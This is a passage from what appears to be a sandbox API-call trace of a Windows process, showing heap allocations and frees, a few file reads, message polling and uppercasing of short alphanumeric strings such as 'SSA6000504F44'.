0x24b1878 [0207.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0207.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0207.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0207.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0207.208] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0207.208] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0207.210] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x9f6, lpOverlapped=0x0) returned 1 [0207.210] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0207.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x109f6) returned 0x24d7a58 [0207.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x109f6) returned 0x34b2250 [0207.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0207.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.215] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x109f6) returned 0x24d7a58 [0207.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0207.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.216] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0207.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0207.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0207.216] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0207.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0207.216] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0207.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0207.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x109f6) returned 0x24d7a58 [0207.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1728 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0207.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0207.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0207.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0207.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x109f6) returned 0x34c2c50 [0207.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0207.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0207.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0207.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0207.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0207.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0207.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0207.220] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0207.220] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0207.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0207.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0207.221] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0207.221] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0207.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0207.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0207.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0207.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0207.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.222] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0207.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0207.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0207.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0207.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0207.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.223] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0207.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0207.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0207.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0207.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0207.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0207.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.225] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0207.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.225] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.225] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0207.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0207.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.226] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0207.226] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.226] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.226] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.226] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 